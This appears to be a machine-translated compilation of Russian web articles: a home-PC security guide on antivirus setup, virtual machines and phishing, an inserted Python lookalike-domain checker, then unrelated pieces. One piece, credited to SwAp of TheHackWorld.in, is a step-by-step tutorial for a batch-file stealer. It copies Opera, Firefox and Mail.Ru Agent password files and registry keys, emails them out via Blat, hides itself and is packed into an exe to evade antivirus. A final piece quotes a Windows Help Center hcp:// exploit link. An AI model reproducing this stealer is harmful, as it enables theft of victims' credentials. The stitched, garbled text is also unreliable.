Computer literacy, help and repair

Viruses can steal passwords from your PC. A virus steals passwords from VKontakte and Odnoklassniki! Be careful! Scanning for viruses

In order not to become a victim, you need to stay safe on the Internet and make the necessary effort to protect your computer!

In this article, or rather set of instructions, I, Vladimir Belev (formerly an employee of the Moscow Instrument-Making Technical School as a technician, engineer and teacher), will describe three simple options an ordinary user has for protecting a computer, and will answer your questions as far as I can in the comments at the end of the article.

If you know where you are going to fall, it is better to spread a feather bed there first!


Introduction

When surfing the Internet from a computer, you may encounter such things as infection of your computer with various malicious programs, which can have very different consequences: from damage to files and disruption of the normal, stable operation of the operating system, up to a complete system failure and even theft of important personal data!

And besides direct infection of your computer, you can simply become a victim of scammers who steal your most important data, such as logins and passwords for various sites, as well as information about your bank cards and any other information whose loss can turn into sudden withdrawals from your accounts.

Therefore, when working on the Internet, you need to be, first of all, extremely careful: try not to visit suspicious and dangerous sites, and also use protection tools for your computer.

Below I will show and explain what options there are to protect against various types of threats when working on the Internet from your computer ...

Option number 1. Applying Simple Antivirus Protection (When Using Windows)

This is perhaps the most relevant, simple and widespread method of protecting your computer from various threats on the Internet. Some antivirus products also include protection of your personal data and additional protection when making payments on the Internet.

Antiviruses, as well as various anti-spyware, anti-trojan and other utilities from the same category, can be paid or free and, of course, are developed by different manufacturers. I have tried both myself, and with growing experience, practice and various experiments, I came to the unequivocal conclusion that free antiviruses can provide decent protection for your computer.

And when to choose paid and when free antivirus? My answer is that it's easier to use free ones.

Paid antiviruses differ for the most part only in having a large amount of additional functionality, for example protected password storage, a built-in program for cleaning the computer or browser, or a tool for updating the software installed on the computer... Additional security elements can also be built in, such as a firewall, which protects your computer from various hacker attacks and, in general, allows you to block Internet access for certain programs according to certain rules.

But all of this, if required, can be found separately in free options, and I think there is simply no need to pay for it.

To date, I have settled on the free Avast antivirus, which I have been using for more than 4 years in a row.

During these 4 years, I have never picked up any serious infection from the Internet that would lead to even minor problems in the operation of my system and the programs installed on it. Of course, all this goes together with such a simple thing as generally cautious browsing: not clicking on links in suspicious e-mails, not entering any data on suspicious and untrusted sites, and in general not visiting sites that do not inspire trust!

Below I will show you how to install and configure the free version of Avast antivirus to work with a high degree of protection.

Modern versions of Windows already have standard antivirus protection called Windows Defender, but for greater security, especially for novice users, I would still recommend using a third-party antivirus (when it is installed, the standard protection will turn itself off).

Installing an antivirus

You can download the antivirus from the official website at the link:

On the page, click the button “Download free antivirus” (may be called a little differently).

If the download does not start, you may be redirected to another page, where you will need to confirm the download or select the version of the antivirus (free or paid).

Run the downloaded file to begin installation.

Do not press the install button right away, but press “Settings”!

Now you need to select those antivirus components that will be installed.

In the image below, the most important and mandatory components of the antivirus are circled in yellow, which will directly protect your computer (scan files on your computer in real time, files downloaded from the Internet, mail, and also analyze system behavior for suspicious actions). Do not remove these check marks!

Everything else can be set as in the same image above. I would recommend exactly this set of components, because some of the rest are useless, and others will not work in the free version of the antivirus. Or you can turn off anything you consider unnecessary for yourself.

You can read what each component is for by hovering the mouse cursor over the question icon next to it.

Click Install.

After the installation is complete, click “Continue” several times in different windows.

In the last window after installation, you will be prompted to install the antivirus on your Android smartphone or tablet. You can always do this directly from the device itself, or you can install it immediately, through this window.

To opt out, click “No, I don’t want” below.

Remember that any antivirus, especially on a smartphone, is an additional load on it (the device may start to slow down), and the battery also discharges faster! From my experience I will say that catching a virus on Android is not so easy; it is much more difficult than on Windows if you do not visit dangerous sites, and in the entire time I have used Android smartphones I have never had an infection leading to a breakdown or unstable operation of the device.

This completes the installation!

Free license activation

After installing the antivirus, it is better to activate your free license immediately, because after 30 days the antivirus may start signaling that the trial has expired. There will be annoying warnings, and soon the antivirus may turn off altogether. However, activation takes a minute and the subscription is given for a year at once, after which you can extend it for another year, and so on indefinitely.

Open the main window of the antivirus and click “Activate”.

Click “Select” under the “Avast Free Antivirus” column (free protection).

In the next window, decline installing the trial version of the paid protection:

That's the whole activation. If the activation period approaches the end, the program will warn you and you will just need to repeat the procedure.

Configuring antivirus

In order for the antivirus to do its work reliably, and also to disable various unnecessary "features", I recommend changing some settings.

Open “Settings” from the main antivirus window.

Program settings

Set a password on the antivirus. This is to prevent possible "smart" malware from disabling your antivirus or managing its settings.

Go to the “Password” subsection, enable the “Protect Avast with a password” function and set any password. Even the simplest will do. You can set the protected areas just like in the image below:

Security settings

Open the "Components" tab and here you can configure each protection component separately.

The settings set initially can be left as they are; with them the antivirus does not overload the system and at the same time protects well. I recommend only changing the sensitivity level to “High” (initially “Normal”). To do this, open the settings for each component one by one and set “High” in the “Sensitivity” tab. Don't forget to save your changes!

May also come in handy in the settings!


Scanning for viruses

No matter how good the antivirus is and how correctly it is configured, there is always the possibility that something on the computer is missed. Therefore, you need to regularly (once a month, for example) run a full scan of your computer for threats to keep your system in good condition and more secure.

To scan your computer with Avast antivirus, go to the "Protection" section and select "Antivirus".

Before running a full scan of your computer, I recommend setting up this type of scan a little. To do this, click on the gear in the corner of the block with this type of scan.

In the “Scanning” - “File types” section, check the “Scan all files” checkbox to scan as thoroughly as possible (it will take longer).

In the “Sensitivity” section, set the sensitivity to high and enable the “Scan whole files” option.

In the "Archivers" section, check "All archivers".

Option number 2. Work in whole or in part through a virtual machine (when using Windows)

This protection method works as follows. A special program is installed on your computer, through which you install a new operating system (whichever you want) and can work in it while inside your real system.

This operating system, which runs for you through the special program, is a virtual machine, that is, a virtual computer.

What does it give you? A virtual machine is an environment separate from your real system, and if viruses get there, they will remain there without causing any harm to your real system.

A virtual machine (often just called a "VM") requires good performance from your computer. Simply put, the computer must be powerful! Of course, a lot also depends on the system that you install as a virtual machine, because, for example, Windows XP requires several times fewer computer resources than modern Windows 10. If your computer is weak, you will not be able to work normally in a virtual machine, and your real system may slow down and fail to cope with some ordinary tasks.

What kind of computer do you need to work with a virtual machine? Sometimes it's easier to just try and check: create a virtual machine, allocate the required amount of RAM to it and see whether it is comfortable to work in or not. It is better to have a processor from the Core i line or a similar one from AMD, and 4 GB of RAM or more, because even the already old Windows 7 requires 2 GB of memory for normal operation. Accordingly, if you have less than 4 GB of RAM on your computer, you can forget about a virtual machine.

Based on the above, you can use a virtual machine in 2 versions:

    Perform most of your actions in it, that is, “walk” on the Internet, download something.

    To do only some actions in the virtual machine, for example, visit sites that you are not sure of the reliability, download files that you are not sure are safe, or install all sorts of unknown programs.

I would not use the first method, since it is simply inconvenient to spend most of your time in a virtual machine. Secondly, for comfortable work in a virtual machine (just like in a regular system) you need a very powerful computer, and that is without taking into account that some tasks may be running in parallel in the real system.

Installing VMware Workstation Player to Create and Work with Virtual Machines

VMware Workstation Player will only run on computers with 64-bit Windows! Nowadays, in the overwhelming majority of cases, this version of Windows is the one installed on computers. Either way, you can just try installing it.

You can download the program from the official website by clicking on the link:

On the page that opens, click the “Download” button opposite the version for Windows (for Windows 64-bit Operating Systems) and the program will start downloading to your computer.

After the installation file is downloaded, run it.

In the first installation window, click Next.

At one of the installation stages, check the box “Enhanced Keyboard Driver” and click “Next”:

Enabling this option means that an extended keyboard driver will be installed for virtual machines; it is better to install it just in case.

In one of the installation windows, uncheck the "Help Improve VMWare Workstation 12 Player" option, and leave the first option enabled:

The first option means that the program will automatically check for updates, and if there is a new version, you can update to it immediately. The second option means helping the program's developers by sending anonymous information about the operation of the program from your computer.

That's it, the installation is complete.

Now run the program and you will see a window like this:

Here you need to select the first item, as in the image above, and enter your e-mail address. This is only required so that you can use the program for free. After entering your e-mail, click "Continue".

In the next window, click "Finish":

The program window will start.

Creating a virtual machine

Now in the main window of the program, click "Create a New Virtual Machine" to create a new virtual machine:

Now we have reached the stage where you need to choose where, that is from which file or disc, the operating system will be installed as a virtual one. The window has 2 options: install from a CD / DVD disc (Installer disc) or install from an image file stored on your computer (Installer disc image file). Choose the first option if you have your own CD / DVD with the OS you want to install as a virtual one:

For example, you have a disk with Windows 7 and you want to install this system as a virtual one. Then insert the disc with this system into your computer and choose the first option.

However, operating systems for installation can also be stored in a special file on your computer called an "image". Then you can install the operating system as a virtual machine directly from this file. Here is an example of a Windows XP image file:

VMWare Workstation Player supports image files in the ".ISO" format, so if you have an ISO image file with an operating system, the easiest way to install a virtual machine is from it. In that case, choose the second option in the current window:

Using the "Browse" button, you can select just the desired image file with the operating system.

After choosing the desired option, click the "Next" button below.

Any operating system can be installed as a virtual one, i.e. any Windows, any Linux or anything else!

I recommend installing Windows 7, because, for example, the old Windows XP has not been supported for a long time and many programs may not work correctly in it, and many will not work at all. The newer ones (Windows 8 and 10) require more performance from your computer to function properly.

In the next window, we are asked to specify in advance the key for installing the operating system, the username and the password:

After all, installing an operating system into a virtual machine is no different from installing a real OS on your computer. The only difference is that the system will be installed virtually, in a window, and not on your real hard disk... But in that window, I recommend leaving only the username, which will most likely be set automatically (taken from your real OS). The key and other parameters, if necessary, are easier to specify during the OS installation itself. So in that window, just click Next to continue.

You will probably see a warning window that you did not specify a key. Click "Yes":

In the next window, in the first field you need to specify the name of the virtual machine that you are creating, and in the second field - the location of the virtual machine files on your computer.

You can name it whatever you like; usually it is named after the OS you are installing. The main thing is that you yourself understand which OS it is, in case you install and work with several virtual OSes in the future. That is, do not call it something like "1234", because then you yourself will not understand what kind of virtual machine has that name until you start it.

You can choose any location for the virtual machine on your computer, that is, any folder or disk in your real system. The files responsible for starting the virtual machine (there will be many of them) will be located in the selected folder.

Please note that the virtual machine will take up a lot of space! How much depends on the system being installed.

When you have specified the name and location, click Next.

In the next window, you need to specify the amount of your hard disk space that will be allocated to the virtual machine being created. This is a very important step!

As I said before, the virtual machine is practically no different from your real OS. It will also have its own hard disk, only a virtual one.

And the size of the virtual OS's hard disk will be equal to the amount of your real hard disk that you allocate for the virtual machine.

Everything here depends on which operating system you install as virtual. If, for example, it is Windows XP, then it does not require a lot of hard disk space and somewhere around 10-15 GB will be enough for it.

But modern Windows operating systems (7, 8, 10) require a decent amount of free disk space for their work: at least 30 GB, and preferably more (depending on what the virtual machine will be used for).

So in the first field of the current window, you need to specify how much of your real hard disk you will allocate for the virtual machine being created.

As I said, as an example I will install a 30-day trial version of Windows XP. For this system, a virtual disk of 15 GB will suffice.

Please note that your real hard disk must have at least as much free space as you allocate for the virtual machine!

By checking that option, we indicated that there is no need to split the virtual hard disk on which the virtual OS will run into several files; let it be in one file. If we had chosen the second option, “Split virtual disk into multiple files”, the virtual hard disk would be divided into several files.

In the next window, you will see information about the settings of the created virtual machine. We could click “Finish” right now to start the installation of the virtual machine, but we will not do that yet.

Let's move on to the additional settings of the virtual machine in order to understand one more extremely important setting; press the "Customize Hardware" button for this:

An additional window with settings on several tabs will open. We are only interested in the "Memory" tab, where the amount of your computer's RAM allocated to the virtual machine is configured.

In this window, you need to specify the amount of your real RAM that will be allocated to the operation of the virtual machine.

Again, it all depends on which operating system you are installing. If it is Windows XP, then it will be able to work with only 128 MB of memory, although it will slow down a lot.

It is better to allocate 1-2 GB of RAM to it. If you are installing Windows 7, 8 or 10 as a virtual machine, then I recommend allocating at least 2 GB of RAM.

But there is one more thing. If your computer has little RAM, then you cannot allocate much to a virtual system!

If the computer has only 2 GB of memory (such a computer is very weak today), then you are unlikely to allocate more than 512 MB (megabytes) of memory to the virtual machine, because if you allocate more, your main system may start to slow down badly. Keep this in mind!

In general, if your computer is weak, it’s easier not to bother with virtual machines.

You will return to the window with information about your virtual machine's settings, and it's time to start installing the virtual machine itself!

Make sure the "Power on this virtual machine after creation" checkbox is checked so that the installation starts immediately and click "Finish":

The installation of the virtual OS you configured will start. First, windows will appear notifying you that some of your real computer's hardware is being connected to the virtual machine, as well as windows with various insignificant information. Just check the box "Do not show this hint again" in these windows and click "OK":

Well, then the installation of the virtual OS will go directly. Using Windows XP as an example, it looks like this:

Installing a system as a virtual machine does not differ from the actual process of installing this system on a computer.

After the operating system is installed as a virtual one, it will start immediately. It all looks something like this (i.e. the operating system in the VMWare program window):

Immediately after the system starts, the installation of additional tools will start automatically in it. This is needed primarily so that you can easily drag files from the real system into the virtual OS window or vice versa, and so that you can freely resize the virtual machine window.

Important nuances of working with virtual machines


Option number 3. Use for work (on an ongoing basis) one of the operating systems Linux or MacOS

In addition to Windows, the most popular operating system in the world, there are also alternatives. The most popular alternatives are the Linux and MacOS systems.

Linux is a free operating system that anyone can freely download from the Internet and install on their computer.

MacOS is the factory system on all Apple computers (Macbooks).

One very important feature unites both of these systems: they are much safer than the Windows familiar to many. That is why I made working in these systems the 3rd option for safe work on a computer.

Working in Linux or MacOS, you don't even need to use antivirus software! There is certainly a risk of infection, but it is minimal compared to Windows, especially since the vast majority of viruses, Trojans and other threats are developed for computers running Windows, and once these files get onto Linux or MacOS, they will simply be harmless.

Should you switch to Linux or stay on Windows?

It's up to you to decide! But I can say that these are fundamentally different systems, similar to Windows only in some features and nothing more. They have a completely different interface; there are many programs in these systems that are not in Windows (and vice versa); for some programs you will have to look for alternatives (for example, there is no Adobe Photoshop for Linux); in general, they are completely different in terms of the structure of the system.

Therefore, if you are a beginner who is not yet on familiar terms with the computer, but have already adapted to working in Windows, then a complete transition to Linux or MacOS can be a real problem for you. Even for experienced users who have been working only in Windows for many years, the transition to Linux will not go without nuances, a lot of questions and misunderstanding of some things.

If this is the case, you will probably find it easier to work in Windows, applying the security measures described in this tutorial. Moreover, Linux and MacOS will not fully protect you from theft of personal data, such as passwords for websites or bank card and account data, even taking into account their security from viral threats.

That is because the users themselves are to blame for data theft, through inexperience and carelessness: it is enough to accidentally land on a fake site, enter your username and password there (thinking that you are entering a familiar site you need), and that's it, the data is with the attackers! This is just one example of how data can be stolen due to user carelessness.

A reminder! Do not forget

It is important to know that no matter what protection you use when working on your computer, in order to protect yourself from viruses that break the system and personal data, from theft of important data, from hacking and everything else, you will not be able to ensure a 100% safe Internet experience if you independently expose yourself to risk through inexperience, ignorance or inattention.

The simplest example. Someone on the Internet asked you for the password to your e-mail and you, trusting the person, sent it. Then this person does what he pleases with your mail: he can delete all the letters, or do nasty things on your behalf. What will the protection that you use for working on the Internet do in this case? Nothing at all!

Whether it is the most advanced antivirus, a virtual machine, or working in a secure Linux system or another system, none of this will help in any way, because in this case you yourself handed your data to the attacker, and this happens all the time, as a rule, due to excessive trust, inexperience and carelessness of users.

I will give an example of user carelessness that leads to theft of personal data.

Suppose you want to log into your VKontakte social network account. As usual, you go to the site of this social network, but do not even notice that the site address is slightly different from the real one.

The original address of this social network is vk.com, but you landed on the site vc.com, which, for example, has exactly the same design as the VKontakte site.

So, having arrived at this fake, fraudulent site, you ignore everything and enter your username and password to log into your account. And then, oops! Your data, namely your login and password, is already in the hands of the intruders! And why? Simple carelessness, probably inexperience. In this case, again, no means of protection will help. An antivirus, of course, can also warn about a phishing site, but not always, because this fake site could have appeared the other day and simply has not been included in the database yet.
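The vk.com / vc.com story above is a typosquat, and the article's point is that a database of known phishing sites may not yet contain a site registered yesterday. The check below is an added example, not code from the original article: it compares the host of a link against a small list of sites the user actually logs in to, and flags the common tricks (a one-letter typo, a trusted name used as a subdomain of a foreign domain, a `user@host` prefix that shows the trusted name first, and punycode `xn--` labels that can hide look-alike Cyrillic letters). The `TRUSTED_DOMAINS` list and all sample URLs are constructed for the demo; `registrable()` takes the last two labels only, which is enough here but not a substitute for the Public Suffix List in real code.

```python
"""Classify a link as trusted, a lookalike of a trusted site, or unknown.

Added example, not from the original article. Works offline: it needs no
phishing database, which is exactly the case the article describes (a fake
site that appeared yesterday). The allowlist below is constructed.
"""
from urllib.parse import urlsplit

# Constructed allowlist: the sites this user logs in to.
TRUSTED_DOMAINS = ("vk.com", "ok.ru", "mail.ru")

# A typo this small (vc.com vs vk.com) is treated as an imitation attempt.
MAX_TYPO_DISTANCE = 1


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance between two strings (number of single-char edits)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def registrable(host: str) -> str:
    """Last two labels: login.vk.com -> vk.com. Demo simplification."""
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


def classify(url: str, trusted=TRUSTED_DOMAINS) -> str:
    """Return 'trusted', 'lookalike-of <domain>', 'suspicious-userinfo',
    'suspicious-idn', 'unknown' or 'invalid'."""
    if "://" not in url:
        url = "https://" + url          # bare hostnames are common in chat links
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".")   # hostname is already lowercased
    except ValueError:
        return "invalid"
    if not host:
        return "invalid"
    if parts.username is not None:
        # https://vk.com@evil.example/ displays vk.com first but connects elsewhere
        return "suspicious-userinfo"
    reg = registrable(host)
    if reg in trusted:
        return "trusted"
    for t in trusted:
        # vk.com.evil.example or login.vk.com.evil.example: trusted name as a subdomain
        if host.startswith(t + ".") or ("." + t + ".") in host:
            return f"lookalike-of {t}"
    if any(label.startswith("xn--") for label in host.split(".")):
        # Internationalised label: may render as Cyrillic letters that look Latin
        return "suspicious-idn"
    for t in trusted:
        if edit_distance(reg, t) <= MAX_TYPO_DISTANCE:
            return f"lookalike-of {t}"
    return "unknown"


if __name__ == "__main__":
    # Constructed sample links, the kind a user might receive in a message.
    for link in ("https://vk.com/feed", "https://vc.com/login",
                 "https://vk.com.evil.example/login", "https://vk.com@evil.example/",
                 "https://xn--kk-abc.example/", "https://shop.example/"):
        print(f"{link:45} -> {classify(link)}")
```

A browser extension or a mail gateway would run the same classification before the login page is shown; the value of the local check is that it does not depend on someone having reported the fake site already.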

And there are a huge number of such examples ...

Therefore, when surfing the Internet, always be alert, attentive and careful. Here are some guidelines.

Actually, treating viruses is not such a difficult operation that you need to pay specialists a lot of money for it. To protect your computer from viruses, or to return it to a "healthy" state in case of infection by removing malicious programs yourself, choose a good antivirus program and observe a few rules. Take at least the two most important ones: the first is to regularly update the anti-virus databases; the second is to completely scan your computer for viruses once a month.

So, with that, I think it's clear that malware removal is done with antivirus software. Antiviruses are paid and free; I described the free methods in the following article:

And now, what is malware, or in other words a virus?

A computer virus, or malware, is a program whose main purpose is causing harm to the computer: damaging user data, stealing or deleting personal information, degrading the computer's performance and much more.

Today malware can be classified into several types according to its effect on the computer.

  • Classic viruses.
  • Trojans.
  • Spies.
  • Rootkits.
  • Adware.

Let's take a closer look at each type of malware.

Classic viruses are malicious programs that can infect a computer, for example via the Internet. The essence of such viruses is self-propagation. Such viruses copy themselves into the files and folders on the infected computer. They do this with the aim of infecting the data so that its recovery is impossible in the future. Such a virus tries to damage all the data on the computer by inserting its code into all files, starting with the system files and ending with the user's personal data. Most often, the salvation for such an infected computer is.

A Trojan horse is a serious type of virus. Trojans are written by cybercriminals for a specific purpose, for example stealing information from computers, stealing passwords, and so on.

A Trojan is divided into two parts. The first part, called the Server, is kept by the attacker, and the second, the Client part, is distributed to every possible corner of the Internet and elsewhere. If the client part of the malicious program gets onto a computer, that PC becomes infected and the Trojan covertly starts sending various information to the attacker.

The Trojan can also perform various operations on the computer at the request of the server (the attacker): steal passwords, infect documents and files with malicious code.

Spies (spyware) are somewhat similar to Trojans. But they have one main difference: spies do not harm the files of the system or the user. Spyware quietly gets onto the computer and spies. It can steal passwords or even record absolutely everything that you type on the keyboard.

Spyware is the most intelligent type of virus and can even send files from the infected computer. A spy knows a lot of information about an infected PC: what system is installed, what antivirus you use, what browser you use for the Internet, what programs are installed on the computer, and so on. Spyware is one of the most dangerous kinds of malware out there.

Rootkits are not viruses in themselves. Rootkits are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer was infected with spyware at the same time as a rootkit. The rootkit will try to hide the spy from your antivirus and operating system. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, Trojans) from the eyes of our antivirus for a long time!

Adware is another type of malicious software. This is a less dangerous program; its essence is to show ads on your computer in all sorts of ways and in different places. Adware does no direct harm and does not infect or spoil files. But you also need to protect yourself from this type of virus.

These are the types of malware that exist. To protect your computer from viruses, we need a good antivirus. I talked about that in another article, and now we will continue the topic of describing viruses and protection schemes for your computer.

Previously, viruses did not have a specific purpose; they were written out of interest and the developer set no particular goal. Now viruses are highly complex algorithms, whose essence is most often theft of money and data. Trojans are usually designed only to steal passwords and other important data.

By the way, you can tell whether your computer has been attacked by viruses from some signs:

  • Programs do not work correctly or stop working altogether.
  • The computer started to slow down, work slowly.
  • Some files get corrupted, refuse to open.

Very often such signs can indicate a computer virus infection, but fortunately not always.

It should be noted that most often one particular virus can infect different types of files. Therefore, even after the computer has been cured of a strong virus attack, the most correct action will be to format the partitions.

Antivirus programs will help you protect yourself from viruses, as I said above. Today, anti-virus programs have features that are enough to repel almost all the malicious programs that spread on the Internet. But for maximum virus protection, an important role is played by a properly selected and configured antivirus program at full "combat" readiness. I recommend that you read the article about. But if you don’t have time, I’ll name the best anti-virus programs for you right here. Today, these are:

  • Kaspersky
  • Avast
  • Dr.Web
  • NOD32

I think there is plenty to choose from.

Good luck and excellent virus protection.

In this article I will describe how quickly and without much difficulty it is possible to write and make a virus that steals files with passwords and sends it all to the mailbox.
Let's start with the fact that the virus will be written in bat "e (CMD, you can take the main commands), that is, in a plain text file and will be executed using the standard built-in Windows" command line "interpreter.
In order to write such a virus, you need to know the exact storage location of those files that it will steal, Blat components that can be downloaded from the off site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code there:

@echo off md% systemroot% \ wincs md% SystemDrive% \ pass \ md% SystemDrive% \ pass \ opera \ md% SystemDrive% \ pass \ Mozilla \ md% SystemDrive% \ pass \ MailAgent \ md% SystemDrive% \ pass \ MailAgent \ reg attrib% systemroot% \ wincs + h + s + r attrib% SystemDrive% \ pass + h + s + r copy / y "% systemroot% \ blat.exe" "% systemroot% \ wincs \ blat.exe" copy / y "% systemroot% \ blat.dll" "% systemroot% \ wincs \ blat.dll" copy / y "% systemroot% \ blat.lib" "% systemroot% \ wincs \ blat.lib" CD / D% APPDATA% \ Opera \ Opera \ copy / y wand.dat% SystemDrive% \ pass \ opera \ wand.dat copy / y cookies4.dat% SystemDrive% \ pass \ opera \ cookies4.da regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins2 regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent_3.reg" HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins3 CD / D% APPDATA% Xcopy Mra \ Base% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y / E> nul Xcopy Mra \ Update \ ver.txt% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y> nul cd% AppData% \ Mozill a \ Firefox \ Profiles \ *. 
default \ copy / y cookies.sqlite% SystemDrive% \ pass \ Mozilla \ cookies.sqlite copy / y key3.db% SystemDrive% \ pass \ Mozilla \ key3.db copy / y signons.sqlite % SystemDrive% \ pass \ Mozilla \ signons.sqlite copy / y% Windir% \ Rar.exe% SystemDrive% \ pass \ Rar.exe> ​​nul del / s / q% SystemRoot% \ Rar.exe% SystemDrive% \ pass \ rar.exe a -r% SystemDrive% \ pass \ pass.rar% SystemDrive% \ pass \ copy / y% SystemDrive% \ pass \ pass.rar% systemroot% \ wincs \ pass.rar cd% systemroot% \ wincs% systemroot % \ wincs \ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren * .rar pass.rar% systemroot% \ wincs \ blat.exe -body FilesPassword -to [email protected] -attach% systemroot% \ wincs \ pass.rar rmdir / s / q% SystemDrive% \ pass rmdir / s / q% systemroot% \ wincs del / s / q% systemroot% \ blat. exe del / s / q% systemroot% \ blat.dll del / s / q% systemroot% \ blat.lib attrib + a + s + h + r% systemroot% \ wind.exe EXIT cls

I will not write out a lot of the code of the batink itself.
@echo off - hides the body of the batinka (so it is not needed, well, anyway)
md% systemroot% \ wincs - creates a wincs folder in the Windows system folder, regardless of which drive it is installed on or how it is named.
md% SystemDrive% \ pass \ - creates a pass folder on the drive where Windows is installed.
md% SystemDrive% \ pass \ opera \ - creates a folder opera where wand.dat and cookies4.dat from Opera browser(up to 11 * versions, the opera stores its passwords in the wand.dat file)
md% SystemDrive% \ pass \ Mozilla \- creates a Mozilla folder where files from the Mozilla browser will be copied (cookies.sqlite, key3.db, signons.sqlite) in which passwords are stored.
md% SystemDrive% \ pass \ MailAgent \- creates a MailAgent folder into which files containing the history of correspondence and registry keys (containing passwords) from the Mail Agent will be copied.
md% SystemDrive% \ pass \ MailAgent \ reg- creates a reg folder
attrib% systemroot% \ wincs + h + s + r- puts attributes on the wincs folder, thereby hiding it from view.
attrib% SystemDrive% \ pass + h + s + r- the same as above.
copy / y "% systemroot% \ blat.exe" "% systemroot% \ wincs \ blat.exe"- copies the blat.exe file from the upload location to the wincs folder
copy / y "% systemroot% \ blat.dll" "% systemroot% \ wincs \ blat.dll"- copies the blat.dll file from the upload location to the wincs folder
copy / y "% systemroot% \ blat.lib" "% systemroot% \ wincs \ blat.lib"- copies the blat.lib file from the upload location to the wincs folder
CD / D% APPDATA% \ Opera \ Opera \ - goes to the opera folder where the files with passwords (and not only) from the opera are located.
copy / y wand.dat% SystemDrive% \ pass \ opera \ wand.dat- copies the wand.dat file to the opera folder
copy / y cookies4.dat% SystemDrive% \ pass \ opera \ cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins2- exports the registry key magent_logins2 where the password is stored to the reg folder
regedit.exe -ea% SystemDrive% \ pass \ MailAgent \ reg \ agent.reg "HKEY_CURRENT_USER \ software \ Mail.Ru \ Agent \ magent_logins3- exports the registry key magent_logins3 where the password is stored to the reg folder
CD / D% APPDATA% - go to the AppData folder
Xcopy Mra \ Base% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y / E> nul- copies the contents of the Mra \ Base folder to the MailAgent folder
Xcopy Mra \ Update \ ver.txt% SystemDrive% \ pass \ MailAgent / K / H / G / Q / R / S / Y> nul- copies the ver.txt file to the MailAgent folder
cd% AppData% \ Mozilla \ Firefox \ Profiles \ *. default \- go to the folder with the Mozila browser profile
copy / y cookies.sqlite% SystemDrive% \ pass \ Mozilla \ cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy / y key3.db% SystemDrive% \ pass \ Mozilla \ key3.db- copies the key3.db file to the Mozilla folder
copy / y signons.sqlite% SystemDrive% \ pass \ Mozilla \ signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy / y% Windir% \ Rar.exe% SystemDrive% \ pass \ Rar.exe> ​​nul- copies the component of the archiver WinRar Rar.exe to the pass folder
del / s / q% SystemRoot% \ Rar.exe- removes the archiver component from the Windows folder
% SystemDrive% \ pass \ rar.exe a -r% SystemDrive% \ pass \ pass.rar% SystemDrive% \ pass \- archive the contents of the pass folder
copy / y% SystemDrive% \ pass \ pass.rar% systemroot% \ wincs \ pass.rar copy the created archive to the wincs folder
cd% systemroot% \ wincs - go to the wincs folder
% systemroot% \ wincs \ blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program for sending the archive by specifying the data for authorization and sending the letter. Do not forget to indicate your data from the mailbox from which the letter with the archive will be sent.
ren * .rar pass.rar - just in case the archive did not accept the wrong name during the course, we will rename it to pass.rar
% systemroot% \ wincs \ blat.exe -body Files Password -to [email protected] -attach% systemroot% \ wincs \ pass.rar- we indicate to which postal address the letter will be sent and send it.
rmdir / s / q% SystemDrive% \ pass- delete the pass folder
rmdir / s / q% systemroot% \ wincs- delete the wincs folder
del / s / q% systemroot% \ blat.exe
del / s / q% systemroot% \ blat.dll- remove Blat components from the Windows folder.
del / s / q% systemroot% \ blat.lib- remove Blat components from the Windows folder.
attrib + a + s + h + r% systemroot% \ wind.exe- we put on ourselves the attributes thereby hiding ourselves from the eyes.
EXIT - we end the batink process and exit.
cls - clear the output of any lines in the intreper.
We copied it, save it as wind.bat and compile it to exe using the Bat to exe converter program, then we put everything together, that is, we take the components of the Blat program and the component of the WinRar archiver (you can download it) and glue it into one executable file, or with which one by some program, the path for unloading all files should be% SystemRoot% or% WindowsDir% or% windir%.
As a result, we get a virus that will not be scorched by antiviruses and will send an archive with files to your mail. Files that come to the mail can be decrypted using multi-password-recovery, though not all, but only wand.dat from the opera and then if it has not been updated to version 11 *. All other files can be decrypted by replacing them with your own.
On this I think we can finish, if you have any questions, do not hesitate to ask.
Thank you for your attention, all the best!
© SwAp TheHackWorld.in

From my childhood I was tormented by the question: "How does a computer get infected with viruses." Finally I found out, felt it for myself. Why not tell the world how this very entertaining process actually goes.

In order not to write a manual on infection, otherwise a lot of people will use it, God forbid, so I will delete some parts of the scripts.

Everyone is probably already fed up with the phrases about how "leaky" MS Windows is, but nevertheless it remains the most widespread system on planet Earth. Or maybe the system is so full of holes precisely because of its prevalence.

And now the attack was carried out through one of the vulnerabilities of the Windows XP system, namely the Windows Help Center.

The beginning, as usual, was a long time ago (already in 2010), you can read about this on the very well-known resource xakep.ru (at the very bottom of the page).

It all started simply.

IE issued a request to open a program from the tjyre.info resource. Obviously a virus! But it's interesting!!

Going to the site http://tjyre.info does not give any information, except that the site is under construction (at the time of posting it does not work at all, apparently they messed it up).

How do I find out what was intended for me on my computer? Elementary: you need to look at where the link leads.

hcp: // services / search? query = anything & topic = hcp: //system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% % A ... %% A %% A %% A ..% 5C ..% 5Csysinfomain.htm% u003fsvr =

As far as my limited knowledge tells me, the link to the virus file is hidden behind the numbers.

